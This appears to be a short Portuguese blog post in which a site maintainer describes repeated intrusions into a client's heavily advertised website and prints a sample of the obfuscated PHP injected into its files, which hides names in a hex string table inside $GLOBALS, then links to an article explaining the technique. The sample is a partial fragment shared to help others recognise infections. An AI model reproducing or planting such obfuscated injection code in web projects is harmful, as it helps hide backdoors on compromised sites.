Link

Exploit com superglobals do php

Pessoal,

Ano passado tive muito probleminha com invasão em um site que dou manutenção. Este site anunciou em tv, outdoor e etc. E ai já sabe né? Prego que se destaca, leva martelada.

O site era versionado com git. Logo, após as invasões, eu consegui facilmente identificar os arquivos injetados. Os arquivos geralmente continham algo parecido com isso:

<?php $GLOBALS['v5fd1710b'] = "\x34\x30\xa\x33\x6f\x52\x5e\x71\x2a\x24\x66\x3e\x78\x50\x2d\x4b\x2c\x6b\x35\x5b\x5d\x7a\x58\x9\x47\x69\x41\x45\x21\x56\x68\x7d\x7b\x36\x76\x73\x6a\x7c\x6e\x6c\x64\x26\x43\x5a\x48\x3a\x25\x6d\x40\x23\x60\x70\x4e\x7e\x4a\x3c\x72\x44\xd\x4f\x62\x74\x20\x28\x46\x63\x5c\x65\x4c\x31\x54\x32\x3f\x67\x3d\x75\x49\x22\x42\x61\x51\x57\x5f\x27\x38\x2e\x59\x53\x2b\x37\x39\x4d\x29\x2f\x79\x55\x3b\x77";
$GLOBALS[$GLOBALS['v5fd1710b'][38].$GLOBALS['v5fd1710b'][79].$GLOBALS['v5fd1710b'][10].$GLOBALS['v5fd1710b'][1].$GLOBALS['v5fd1710b'][18].$GLOBALS['v5fd1710b'][84].$GLOBALS['v5fd1710b'][79]] = $GLOBALS['v5fd1710b'][65].$GLOBALS['v5fd1710b'][30].$GLOBALS['v5fd1710b'][56];
$GLOBALS[$GLOBALS['v5fd1710b'][65].$GLOBALS['v5fd1710b'][90].$GLOBALS['v5fd1710b'][89].$GLOBALS['v5fd1710b'][10]] = $GLOBALS['v5fd1710b'][4].$GLOBALS['v5fd1710b'][56].$GLOBALS['v5fd1710b'][40];

Após uma pesquisa rápida, achei um link que foi muito útil pra mim e espero que sirva pra vocês também (na verdade eu espero que vocês não passem por isso):

https://www.conetix.com.au/blog/php-superglobals-exploit

Deixe um comentário

Preencha os seus dados abaixo ou clique em um ícone para log in:

Logotipo do WordPress.com

Você está comentando utilizando sua conta WordPress.com. Sair /  Alterar )

Foto do Google

Você está comentando utilizando sua conta Google. Sair /  Alterar )

Imagem do Twitter

Você está comentando utilizando sua conta Twitter. Sair /  Alterar )

Foto do Facebook

Você está comentando utilizando sua conta Facebook. Sair /  Alterar )

Conectando a %s